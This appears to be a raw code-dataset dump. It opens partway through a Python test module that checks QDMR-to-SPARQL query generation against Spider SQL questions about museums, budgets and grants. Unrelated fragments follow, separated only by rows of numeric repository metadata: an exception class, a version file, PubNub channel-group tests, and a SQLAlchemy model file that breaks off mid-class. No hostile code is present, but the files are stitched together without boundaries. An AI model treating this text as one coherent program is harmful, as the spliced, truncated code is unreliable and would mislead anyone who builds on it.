grounding[GroundingIndex(0,0,"museums")] = GroundingKey.make_table_grounding("museum")
grounding[GroundingIndex(1,1,"that opened before 2009")] = GroundingKey.make_comparative_grounding("<", "2009", GroundingKey.make_column_grounding("museum", "Open_Year"))
grounding[GroundingIndex(2,1,"that opened after 2011")] = GroundingKey.make_comparative_grounding(">", "2011", GroundingKey.make_column_grounding("museum", "Open_Year"))
grounding[GroundingIndex(3,0,"the visitor of #REF")] = GroundingKey.make_table_grounding("visitor")
grounding[GroundingIndex(5,0,"name of #REF")] = GroundingKey.make_column_grounding("visitor", "Name")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_swap_args(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 426
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# SQL:
# SELECT t1.name FROM visitor AS t1 JOIN visit AS t2 ON t1.id = t2.visitor_id JOIN museum AS t3 ON t3.Museum_ID = t2.Museum_ID
# WHERE t3.open_year < 2009
# INTERSECT
# SELECT t1.name FROM visitor AS t1 JOIN visit AS t2 ON t1.id = t2.visitor_id JOIN museum AS t3 ON t3.Museum_ID = t2.Museum_ID WHERE
# t3.open_year > 2011
# Question: What is the name of the visitor who visited both a museum opened before 2009 and a museum opened after 2011?
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
{
SELECT ?visitor
WHERE
{
{
SELECT ?visitor
WHERE
{
?visitor_ID arc:visit:visitor_ID:visitor:ID ?visitor.
?visit arc:visit:visitor_ID ?visitor_ID.
?visit arc:visit:Museum_ID ?Museum_ID.
?Museum_ID arc:visit:Museum_ID:museum:Museum_ID ?museum.
?museum arc:museum:Open_Year ?Open_Year.
FILTER(?Open_Year < "2009").
}
GROUP BY ?visitor
}
?visitor_ID_1 arc:visit:visitor_ID:visitor:ID ?visitor.
?visit_1 arc:visit:visitor_ID ?visitor_ID_1.
?visit_1 arc:visit:Museum_ID ?Museum_ID_1.
?Museum_ID_1 arc:visit:Museum_ID:museum:Museum_ID ?museum_1.
?museum_1 arc:museum:Open_Year ?Open_Year_1.
FILTER(?Open_Year_1 > "2011").
}
GROUP BY ?visitor
}
?visitor arc:visitor:Name ?Name.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# #1: SELECT['museums']
# #2: FILTER['#1', 'that opened before 2009']
# #3: FILTER['#1', 'that opened after 2011']
# #4: PROJECT['the visitor of #REF', '#1']
# #5: INTERSECTION['#4', '#2', '#3']
# #6: PROJECT['name of #REF', '#5']
grounding = {}
grounding[GroundingIndex(0,0,"museums")] = GroundingKey.make_table_grounding("museum")
grounding[GroundingIndex(1,1,"that opened before 2009")] = GroundingKey.make_comparative_grounding(">", "2011", GroundingKey.make_column_grounding("museum", "Open_Year"))
grounding[GroundingIndex(2,1,"that opened after 2011")] = GroundingKey.make_comparative_grounding("<", "2009", GroundingKey.make_column_grounding("museum", "Open_Year"))
grounding[GroundingIndex(3,0,"the visitor of #REF")] = GroundingKey.make_table_grounding("visitor")
grounding[GroundingIndex(5,0,"name of #REF")] = GroundingKey.make_column_grounding("visitor", "Name")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_intersection_via_double_filter(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 426
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# SQL:
# SELECT t1.name FROM visitor AS t1 JOIN visit AS t2 ON t1.id = t2.visitor_id JOIN museum AS t3 ON t3.Museum_ID = t2.Museum_ID
# WHERE t3.open_year < 2009
# INTERSECT
# SELECT t1.name FROM visitor AS t1 JOIN visit AS t2 ON t1.id = t2.visitor_id JOIN museum AS t3 ON t3.Museum_ID = t2.Museum_ID WHERE
# t3.open_year > 2011
# Question: What is the name of the visitor who visited both a museum opened before 2009 and a museum opened after 2011?
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
{
SELECT ?visitor
WHERE
{
{
SELECT ?visitor
WHERE
{
?visitor_ID arc:visit:visitor_ID:visitor:ID ?visitor.
?visit arc:visit:visitor_ID ?visitor_ID.
?visit arc:visit:Museum_ID ?Museum_ID.
?Museum_ID arc:visit:Museum_ID:museum:Museum_ID ?museum.
?museum arc:museum:Open_Year ?Open_Year.
FILTER(?Open_Year < "2009").
}
GROUP BY ?visitor
}
?visitor_ID_1 arc:visit:visitor_ID:visitor:ID ?visitor.
?visit_1 arc:visit:visitor_ID ?visitor_ID_1.
?visit_1 arc:visit:Museum_ID ?Museum_ID_1.
?Museum_ID_1 arc:visit:Museum_ID:museum:Museum_ID ?museum_1.
?museum_1 arc:museum:Open_Year ?Open_Year_1.
FILTER(?Open_Year_1 > "2011").
}
GROUP BY ?visitor
}
?visitor arc:visitor:Name ?Name.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# #1: SELECT['visitor']
# #2: FILTER['#1', 'that visited a museum opened before 2009']
# #3: FILTER['#2', 'that visited a museum opened after 2011']
# #4: PROJECT['name of #REF', '#3']
qdmr = QdmrInstance(["select", "filter", "filter", "project"],
[["visitor"],
['#1', 'that visited a museum opened before 2009'],
['#2', 'that visited a museum opened after 2011'],
['name of #REF', '#3']
])
grounding = {}
grounding[GroundingIndex(0,0,"visitor")] = GroundingKey.make_table_grounding("visitor")
grounding[GroundingIndex(1,1,"that visited a museum opened before 2009")] = GroundingKey.make_comparative_grounding("<", "2009", GroundingKey.make_column_grounding("museum", "Open_Year"))
grounding[GroundingIndex(2,1,"that visited a museum opened after 2011")] = GroundingKey.make_comparative_grounding(">", "2011", GroundingKey.make_column_grounding("museum", "Open_Year"))
grounding[GroundingIndex(3,0,"name of #REF")] = GroundingKey.make_column_grounding("visitor", "Name")
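# chaining the two FILTER steps over the same visitor set reproduces the SQL
# INTERSECT as the nested per-visitor GROUP BY subqueries in the reference query above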
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderTrain1353(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_train(self):
"""Test an entry from the Spider dataset."""
split_name = "train"
i_query = 1353
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# Question: What is the sum of budgets of the Marketing and Finance departments?
# sql_query:
# SELECT sum(budget) FROM department WHERE dept_name = 'Marketing' OR dept_name = 'Finance'
correct_sparql_query = textwrap.dedent("""\
SELECT (?budget_1 + ?budget_2 AS ?sum)
WHERE
{
?dep_1 arc:department:budget ?budget_1.
?dep_1 arc:department:dept_name ?dept_name_1.
FILTER(?dept_name_1 = key:department:dept_name:Marketing).
?dep_2 arc:department:budget ?budget_2.
?dep_2 arc:department:dept_name ?dept_name_2.
FILTER(?dept_name_2 = key:department:dept_name:Finance).
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['budgets']
# FILTER['#1', 'of the Marketing department']
# FILTER['#1', 'of the Finance department']
# ARITHMETIC['sum', '#2', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"budgets")] = GroundingKey.make_column_grounding("department", "budget")
# grounding looks like key:department:dept_name:Marketing because that value is a key in the RDF graph
grounding[GroundingIndex(1,1,"of the Marketing department")] = GroundingKey.make_value_grounding("department", "dept_name", "Marketing")
grounding[GroundingIndex(2,1,"of the Finance department")] = GroundingKey.make_value_grounding("department", "dept_name", "Finance")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderTrain4320(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_train(self):
"""Test an entry from the Spider dataset."""
split_name = "train"
i_query = 4320
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# Question: What are the distinct grant amount for the grants where the documents were sent before '1986-08-26 20:49:27' and grant were ended after '1989-03-16 18:27:16'?
# sql_query:
# SELECT T1.grant_amount FROM Grants AS T1 JOIN Documents AS T2 ON T1.grant_id = T2.grant_id WHERE T2.sent_date < '1986-08-26 20:49:27'
# INTERSECT
# SELECT grant_amount FROM grants WHERE grant_end_date > '1989-03-16 18:27:16'
# CAUTION: this query compares the dates as plain strings and only works by luck; the dates should be parsed properly
correct_sparql_query = textwrap.dedent("""\
SELECT DISTINCT ?grant_amount
WHERE
{
{
SELECT ?Grants
WHERE
{
{
SELECT ?Grants
WHERE
{
?grant_id arc:Documents:grant_id:Grants:grant_id ?Grants.
?Documents arc:Documents:grant_id ?grant_id.
?Documents arc:Documents:sent_date ?sent_date.
FILTER(?sent_date < "1986-08-26 20:49:27").
}
GROUP BY ?Grants
}
?Grants arc:Grants:grant_end_date ?grant_end_date.
FILTER(?grant_end_date > "1989-03-16 18:27:16").
}
GROUP BY ?Grants
}
?Grants arc:Grants:grant_amount ?grant_amount.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# #1: SELECT['grants']
# #2: PROJECT['documents of #REF', '#1']
# #3: PROJECT['when #REF were sent', '#2']
# #4: PROJECT['when #REF ended', '#1']
# #5: COMPARATIVE['#1', '#3', 'is before 1986-08-26 20:49:27']
# #6: COMPARATIVE['#1', '#4', 'is after 1989-03-16 18:27:16']
# #7: INTERSECTION['#1', '#5', '#6']
# #8: PROJECT['distinct grant amounts of #REF', '#7']
grounding = {}
grounding[GroundingIndex(0,0,"grants")] = GroundingKey.make_table_grounding("Grants")
grounding[GroundingIndex(1,0,"documents of #REF")] = GroundingKey.make_table_grounding("Documents")
grounding[GroundingIndex(2,0,"when #REF were sent")] = GroundingKey.make_column_grounding("Documents", "sent_date")
grounding[GroundingIndex(3,0,"when #REF ended")] = GroundingKey.make_column_grounding("Grants", "grant_end_date")
grounding[GroundingIndex(4,2,"is before 1986-08-26 20:49:27")] = GroundingKey.make_comparative_grounding("<", "1986-08-26 20:49:27", GroundingKey.make_column_grounding("Documents", "sent_date"))
grounding[GroundingIndex(5,2,"is after 1989-03-16 18:27:16")] = GroundingKey.make_comparative_grounding(">", "1989-03-16 18:27:16", GroundingKey.make_column_grounding("Grants", "grant_end_date"))
grounding[GroundingIndex(7,0,"distinct grant amounts of #REF")] = GroundingKey.make_column_grounding("Grants", "grant_amount")
grounding["distinct"] = ["#8"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
# class TestSpiderTrain1384(unittest.TestCase):
# @timeout(ONE_TEST_TIMEOUT)
# def test_spider_dev(self):
# """Test an entry from spider dataset
# """
# split_name = "train"
# i_query = 1384
# db_id = get_db_id(split_name, i_query)
# rdf_graph, schema = get_graph_and_schema(split_name, db_id)
# sql_query = get_sql_query(split_name, i_query)
# # Question: Find the name of the students and their department names sorted by their total credits in ascending order.
# # sql_query:
# # SELECT name , dept_name FROM student ORDER BY tot_cred
# # CAUTION: this test works fine but is super slow (large database) so I'm commenting it out by default
# correct_sparql_query = textwrap.dedent("""\
# SELECT ?name ?dept_name ?tot_cred
# WHERE
# {
# ?student arc:student:name ?name.
# ?student arc:student:dept_name ?dept_name.
# ?student arc:student:tot_cred ?tot_cred.
# }
# ORDER BY ASC(?tot_cred)""")
# qdmr = get_qdmr_from_break(split_name, i_query)
# qdmr.args[3] = ["#1", "#3", "in ascending order"]
# # break_program:
# # SELECT['students']
# # PROJECT['credits of #REF', '#1']
# # GROUP['sum', '#2', '#1']
# # SORT['#1', '#3', 'in ascending order']
# # PROJECT['names of #REF', '#4']
# # PROJECT['departments of #REF', '#4']
# # PROJECT['names of #REF', '#6']
# # UNION['#5', '#7']
# grounding = {}
# grounding[GroundingIndex(0,0,"students")] = GroundingKey.make_table_grounding("student")
# grounding[GroundingIndex(1,0,"credits of #REF")] = GroundingKey.make_column_grounding("student", "tot_cred")
# grounding[GroundingIndex(3,2,"in ascending order")] = GroundingKey.make_sortdir_grounding(ascending=True)
# grounding[GroundingIndex(4,0,"names of #REF")] = GroundingKey.make_column_grounding("student", "name")
# grounding[GroundingIndex(5,0,"departments of #REF")] = GroundingKey.make_column_grounding("student", "dept_name")
# grounding[GroundingIndex(6,0,"names of #REF")] = GroundingKey.make_column_grounding("student", "dept_name")
# sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
# result_correct = QueryResult.execute_query_sql(sql_query, schema)
# result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
# equal, message = result.is_equal_to(result_correct,
# require_column_order=True,
# require_row_order=True,
# return_message=True)
# self.assertTrue(equal, message)
if __name__ == '__main__':
datasets_break = {}
datasets_spider = {}
script_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.abspath(os.path.join(script_path, ".."))
spider_path = os.path.join(root_path, "data", "spider")
db_path = os.path.join(spider_path, "database")
qdmr_path = os.path.join(root_path, "data", "break", "logical-forms")
for split_name in ['dev', 'train']:
datasets_break[split_name] = DatasetBreak(qdmr_path, split_name)
datasets_spider[split_name] = DatasetSpider(spider_path, split_name)
def get_db_id(subset, i_query):
query_name, sql_data = datasets_spider[subset][i_query]
db_id = sql_data["db_id"]
return db_id
@lru_cache()
def get_graph_and_schema(subset, db_id):
dataset_spider = datasets_spider[subset]
table_data = dataset_spider.table_data
schema = dataset_spider.schemas[db_id]
assert db_id in table_data, f"Could not find database {db_id} in any subset"
table_data = table_data[db_id]
schema.load_table_data(db_path)
rdf_graph = RdfGraph(schema)
return rdf_graph, schema
def get_qdmr_from_break(subset, i_query):
qdmr = datasets_break[subset].get_qdmr_by_subset_indx(i_query, "SPIDER")
# qdmr_name = dataset_break.get_name_by_subset_indx(args.spider_idx)
return qdmr
def get_sql_query(subset, i_query):
query_name, sql_data = datasets_spider[subset][i_query]
sql_query = sql_data["query"]
return sql_query
unittest.main()
| 47.512371 | 203 | 0.593109 | 25,232 | 230,435 | 5.122186 | 0.02699 | 0.040938 | 0.044087 | 0.062123 | 0.871637 | 0.848023 | 0.823867 | 0.801011 | 0.772545 | 0.749302 | 0 | 0.018537 | 0.303079 | 230,435 | 4,849 | 204 | 47.52217 | 0.786239 | 0.15456 | 0 | 0.670592 | 0 | 0.00062 | 0.28782 | 0.028825 | 0 | 0 | 0 | 0 | 0.02789 | 1 | 0.02789 | false | 0 | 0.003719 | 0 | 0.049892 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
135bf88d4da45acaf82ad571e349573147329850 | 219 | py | Python | paprika/consumers/ConsumeException.py | thunder-/paprika | af262407ec9c195dbb5a7c205510e6ad2fb65f36 | [
"MIT"
] | null | null | null | paprika/consumers/ConsumeException.py | thunder-/paprika | af262407ec9c195dbb5a7c205510e6ad2fb65f36 | [
"MIT"
] | null | null | null | paprika/consumers/ConsumeException.py | thunder-/paprika | af262407ec9c195dbb5a7c205510e6ad2fb65f36 | [
"MIT"
] | null | null | null | class ConsumeException(Exception):
def __init__(self, message):
self.__message = message
def __str__(self):
return repr(self.__message)
def get_message(self):
return self.__message
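# Minimal usage sketch (hypothetical caller code, not part of this module):
#
# try:
#     raise ConsumeException('malformed message payload')
# except ConsumeException as e:
#     print(e.get_message())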
| 21.9 | 35 | 0.666667 | 24 | 219 | 5.458333 | 0.458333 | 0.335878 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.246575 | 219 | 9 | 36 | 24.333333 | 0.793939 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0 | 0.285714 | 0.857143 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
13ab8273ae4504f7926b2efd052269daf6cdeb34 | 77 | py | Python | tf2onnx/version.py | Sarang2Twins/tensorflow-onnx | ed6142baa3c2db878e96292e4acb1929eff59dbd | [
"Apache-2.0"
] | null | null | null | tf2onnx/version.py | Sarang2Twins/tensorflow-onnx | ed6142baa3c2db878e96292e4acb1929eff59dbd | [
"Apache-2.0"
] | null | null | null | tf2onnx/version.py | Sarang2Twins/tensorflow-onnx | ed6142baa3c2db878e96292e4acb1929eff59dbd | [
"Apache-2.0"
] | null | null | null |
version = '1.10.0'
git_version = '496b65d7d33c621b3e2e53844af0dd64240fcf69'
| 19.25 | 56 | 0.805195 | 7 | 77 | 8.714286 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.428571 | 0.090909 | 77 | 3 | 57 | 25.666667 | 0.442857 | 0 | 0 | 0 | 0 | 0 | 0.605263 | 0.526316 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13b2d8cb5f58ffbb30a4102f8bd4773e69562f13 | 5,433 | py | Python | tests/integrational/native_sync/test_channel_groups.py | Versature/pubnub-python | a558d212a44ada6fbf2793a32e93685c959b8b22 | [
"MIT"
] | null | null | null | tests/integrational/native_sync/test_channel_groups.py | Versature/pubnub-python | a558d212a44ada6fbf2793a32e93685c959b8b22 | [
"MIT"
] | null | null | null | tests/integrational/native_sync/test_channel_groups.py | Versature/pubnub-python | a558d212a44ada6fbf2793a32e93685c959b8b22 | [
"MIT"
] | null | null | null | import logging
import time
import unittest
import pubnub
from pubnub.models.consumer.channel_group import PNChannelGroupsAddChannelResult, PNChannelGroupsListResult, \
PNChannelGroupsRemoveChannelResult, PNChannelGroupsRemoveGroupResult
from pubnub.pubnub import PubNub
from tests.helper import pnconf_copy
from tests.integrational.vcr_helper import use_cassette_and_stub_time_sleep_native
pubnub.set_stream_logger('pubnub', logging.DEBUG)
class TestPubNubChannelGroups(unittest.TestCase):
@use_cassette_and_stub_time_sleep_native(
'tests/integrational/fixtures/native_sync/channel_groups/single_channel.yaml',
filter_query_parameters=['uuid', 'pnsdk'])
def test_single_channel(self):
ch = "channel-groups-native-ch"
gr = "channel-groups-native-cg"
pubnub = PubNub(pnconf_copy())
# cleanup
envelope = pubnub.remove_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsRemoveGroupResult)
# add
envelope = pubnub.add_channel_to_channel_group() \
.channels(ch) \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsAddChannelResult)
time.sleep(2)
# list
envelope = pubnub.list_channels_in_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsListResult)
assert len(envelope.result.channels) == 1
assert envelope.result.channels[0] == ch
# remove
envelope = pubnub.remove_channel_from_channel_group() \
.channels(ch) \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsRemoveChannelResult)
time.sleep(2)
# list
envelope = pubnub.list_channels_in_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsListResult)
assert len(envelope.result.channels) == 0
@use_cassette_and_stub_time_sleep_native(
'tests/integrational/fixtures/native_sync/channel_groups/add_remove_multiple_channels.yaml',
filter_query_parameters=['uuid', 'pnsdk'])
def test_add_remove_multiple_channels(self):
ch1 = "channel-groups-unit-ch1"
ch2 = "channel-groups-unit-ch2"
gr = "channel-groups-unit-cg"
pubnub = PubNub(pnconf_copy())
# cleanup
envelope = pubnub.remove_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsRemoveGroupResult)
# add
envelope = pubnub.add_channel_to_channel_group() \
.channels([ch1, ch2]) \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsAddChannelResult)
time.sleep(1)
# list
envelope = pubnub.list_channels_in_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsListResult)
assert len(envelope.result.channels) == 2
assert ch1 in envelope.result.channels
assert ch2 in envelope.result.channels
# remove
envelope = pubnub.remove_channel_from_channel_group() \
.channels([ch1, ch2]) \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsRemoveChannelResult)
time.sleep(1)
# list
envelope = pubnub.list_channels_in_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsListResult)
assert len(envelope.result.channels) == 0
@use_cassette_and_stub_time_sleep_native(
'tests/integrational/fixtures/native_sync/channel_groups/add_channel_remove_group.yaml',
filter_query_parameters=['uuid', 'pnsdk'])
def test_add_channel_remove_group(self):
ch = "channel-groups-unit-ch"
gr = "channel-groups-unit-cg"
pubnub = PubNub(pnconf_copy())
# cleanup
envelope = pubnub.remove_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsRemoveGroupResult)
# add
envelope = pubnub.add_channel_to_channel_group() \
.channels(ch) \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsAddChannelResult)
time.sleep(1)
# list
envelope = pubnub.list_channels_in_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsListResult)
assert len(envelope.result.channels) == 1
assert envelope.result.channels[0] == ch
# remove
envelope = pubnub.remove_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsRemoveGroupResult)
time.sleep(1)
# list
envelope = pubnub.list_channels_in_channel_group() \
.channel_group(gr) \
.sync()
assert isinstance(envelope.result, PNChannelGroupsListResult)
assert len(envelope.result.channels) == 0
| 31.587209 | 110 | 0.646052 | 527 | 5,433 | 6.417457 | 0.129032 | 0.109994 | 0.062093 | 0.079834 | 0.79657 | 0.79657 | 0.79657 | 0.786813 | 0.77469 | 0.736546 | 0 | 0.005987 | 0.262102 | 5,433 | 171 | 111 | 31.77193 | 0.837615 | 0.015829 | 0 | 0.780702 | 0 | 0 | 0.082911 | 0.076721 | 0 | 0 | 0 | 0 | 0.219298 | 1 | 0.026316 | false | 0 | 0.070175 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9218a0a06cfcd5ddd4cadbb0b2246db7a1a5ac9 | 36 | py | Python | src/factory/__init__.py | menshiva/ascii-art | 3493d8eefe6625f3960e712351908b410441389a | [
"Apache-2.0"
] | null | null | null | src/factory/__init__.py | menshiva/ascii-art | 3493d8eefe6625f3960e712351908b410441389a | [
"Apache-2.0"
] | null | null | null | src/factory/__init__.py | menshiva/ascii-art | 3493d8eefe6625f3960e712351908b410441389a | [
"Apache-2.0"
] | null | null | null | from .art_factory import ArtFactory
| 18 | 35 | 0.861111 | 5 | 36 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 36 | 1 | 36 | 36 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b92a7fc3609935cfad630e071e0b2016c718733c | 39 | py | Python | comments/tests/conftest.py | HotStew/respa | 04f39efb15b4f4206a122e665f8377c7198e1f25 | [
"MIT"
] | 49 | 2015-10-21T06:25:31.000Z | 2022-03-20T07:24:20.000Z | comments/tests/conftest.py | HotStew/respa | 04f39efb15b4f4206a122e665f8377c7198e1f25 | [
"MIT"
] | 728 | 2015-06-24T13:26:54.000Z | 2022-03-24T12:18:41.000Z | comments/tests/conftest.py | digipointtku/respa | a529e0df4d3f072df7801adb5bf97a5f4abd1243 | [
"MIT"
] | 46 | 2015-06-26T10:52:57.000Z | 2021-12-17T09:38:25.000Z | from resources.tests.conftest import *
| 19.5 | 38 | 0.820513 | 5 | 39 | 6.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b96f41f17489e840f487ad83fbf5e8e87ceb5a89 | 7,682 | py | Python | pyphabricatordb/almanac.py | veblush/PyPhabricatorDb | 154efbe225d593e9f073d73fd428171f1dd0536b | [
"MIT"
] | null | null | null | pyphabricatordb/almanac.py | veblush/PyPhabricatorDb | 154efbe225d593e9f073d73fd428171f1dd0536b | [
"MIT"
] | null | null | null | pyphabricatordb/almanac.py | veblush/PyPhabricatorDb | 154efbe225d593e9f073d73fd428171f1dd0536b | [
"MIT"
] | null | null | null | # coding: utf-8
from sqlalchemy import BINARY, Column, Index, Integer, String, VARBINARY
from sqlalchemy import String, Unicode, ForeignKey
from sqlalchemy.orm import relationship, backref
from dbdatetime import dbdatetime
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class AlmanacBinding(Base):
__tablename__ = 'almanac_binding'
__table_args__ = (
Index('key_service', 'servicePHID', 'interfacePHID', unique=True),
)
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
servicePHID = Column(String, nullable=False)
devicePHID = Column(String, nullable=False, index=True)
interfacePHID = Column(String, nullable=False, index=True)
mailKey = Column(BINARY(20), nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
class AlmanacBindingTransaction(Base):
__tablename__ = 'almanac_bindingtransaction'
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
authorPHID = Column(String, nullable=False)
objectPHID = Column(String, nullable=False, index=True)
viewPolicy = Column(String, nullable=False)
editPolicy = Column(String, nullable=False)
commentPHID = Column(String)
commentVersion = Column(Integer, nullable=False)
transactionType = Column(Unicode(32), nullable=False)
oldValue = Column(Unicode, nullable=False)
newValue = Column(Unicode, nullable=False)
contentSource = Column(Unicode, nullable=False)
usermetadata = Column('metadata', Unicode, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
class AlmanacDevice(Base):
__tablename__ = 'almanac_device'
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
name = Column(Unicode(128), nullable=False, index=True)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
nameIndex = Column(BINARY(12), nullable=False, unique=True)
mailKey = Column(BINARY(20), nullable=False)
viewPolicy = Column(String, nullable=False)
editPolicy = Column(String, nullable=False)
